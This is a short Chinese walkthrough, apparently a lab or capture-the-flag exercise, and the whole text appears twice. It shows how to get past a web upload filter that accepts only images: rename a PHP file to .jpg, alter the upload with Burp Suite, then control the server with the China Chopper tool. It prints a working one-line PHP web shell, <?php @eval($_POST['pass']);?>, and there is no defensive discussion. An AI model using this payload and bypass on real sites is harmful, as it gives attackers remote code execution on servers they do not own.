使用工具:burp suite and 中国菜刀
首先上传一个一句话木马.php文件试一下水
说明不允许上传,只允许上传.jpg,.png,.gif文件,那么我们把.php文件改为.jpg文件,打开代理再次上传
然后复制图片地址,打开中国菜刀
把地址粘贴进去,后面写入你一句话木马里 <?php @eval($_POST['pass']);?>我这里是pass,脚本类型选择php然后添加,双击进入。
2024-01-17 11:27:22
使用工具:burp suite and 中国菜刀
首先上传一个一句话木马.php文件试一下水
说明不允许上传,只允许上传.jpg,.png,.gif文件,那么我们把.php文件改为.jpg文件,打开代理再次上传
然后复制图片地址,打开中国菜刀
把地址粘贴进去,后面写入你一句话木马里 <?php @eval($_POST['pass']);?>我这里是pass,脚本类型选择php然后添加,双击进入。